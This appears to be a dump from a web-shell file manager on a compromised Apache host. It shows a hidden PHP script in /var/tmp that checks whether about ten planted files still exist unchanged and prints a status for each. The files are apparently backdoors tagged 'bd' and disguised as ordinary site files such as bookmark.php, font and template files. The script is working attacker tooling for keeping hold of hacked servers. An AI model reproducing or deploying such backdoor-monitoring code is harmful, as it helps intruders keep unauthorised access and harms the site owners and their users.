HEX
Server: Apache
System: Linux pdx1-shared-a1-14 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: burgaska (13506502)
PHP: 8.1.32
Disabled: NONE
Upload Files
File: //var/tmp/.requests
<?php   $r = '/home/notarealjob/uploads.notarealjob.com'; $x = ["/cryptocurrency/templates/tmp/css/bookmark.php"=>"bd@@40983@@1092",
"/uploads/2018/language.lib.php"=>"bd@@40736@@accept",
"/cryptocurrency/templates/tmp/bottom1.php"=>"bd@@40225@@request",
"/cryptocurrency/templates/tmp/fonts/bilder.php"=>"bd@@41045@@838",
"/uploads/2018/prova_textarea.php"=>"bd@@41348@@911",
"/cryptocurrency/templates/tmp/css/log.class.php"=>"bd@@40849@@X-Dns-Prefetch-Control",
"/download.php"=>"bd@@40340@@requests",
"/cryptocurrency/templates/tmp/js/default.content.php"=>"bd@@41117@@868",
"/cryptocurrency/templates/tmp/js/default_content.php"=>"bd@@40640@@X-Dns-Prefetch-Control",
"/cryptocurrency/templates/tmp/copytemplate.php"=>"bd@@41191@@884"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');